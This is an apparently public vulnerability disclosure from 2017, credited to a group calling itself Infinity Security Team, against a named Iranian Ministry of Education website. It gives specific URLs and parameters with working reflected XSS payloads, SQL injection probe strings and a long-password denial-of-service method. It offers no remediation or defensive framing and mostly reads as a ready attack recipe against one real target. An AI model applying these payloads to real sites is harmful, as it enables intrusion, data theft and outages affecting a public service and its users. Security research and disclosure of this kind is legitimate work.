Iran's Sensing Center, Ministry of Education XSS / SQLi / DoS /CSRF

Published
Credit
Risk
2017.06.20
Infinity Security Team
Low
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

# Vulnerability Title: Iran's Sensing Center, Ministry of Education High level vulns
# Date: 2017-06-20
# Exploit Author: Infinity Security Team
# Google Dork: [-]
# Vendor Homepage: http://www.medu.ir
# Tested on: Windows 7 (applicable to all Windows platforms)
# I show you how deep the rabbit-hole goes. "Morpheus"
--------------------------
1.Cross Site Scripting (XSS):
[+] http://aee.medu.ir/IranEduThms/theme2/cntntpge.php
- "rcid" (GET input) parameter most set to:
- 67" onmouseover=prompt(916009) bad="
- or
- 67" onmouseover=prompt(948428) bad="

2. Long Password Denial of Service:
=>the atacker may cause the website to become temporarily/indefinitely unavailable or unresponsive.

[+] http://aee.medu.ir/IranEdu/edu_usrlgnchck.php
- Vulnerable password input: "pass11"
- test +1000000 characters.

3.SQL injection:
[+] http://aee.medu.ir/IranEdu/edu_getofferview.php > "cfnam" parameter was set to "\"
"cmail" parameter was set to "\"
"ctext" parameter was set to "\"
[+] http://aee.medu.ir/IranEdu/edu_newstoprnt.php > "rcid" parameter was set to "1'""
[+] http://aee.medu.ir/IranEdu/edu_sndtofrnd.php > "rcid" parameter was set to "1'""
[+] http://aee.medu.ir/IranEduThms/theme2/cntntpge.php > "rcid" parameter was set to "1'""
- all GET input
--------------------------
# Discovered By: Root_Killer(https://t.me/root_killer)
# https://t.me/InfinitySec
# Root_Killer, Ehsan Korn
# @InfinitySec, @root_killer, @pohzeyshen



See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com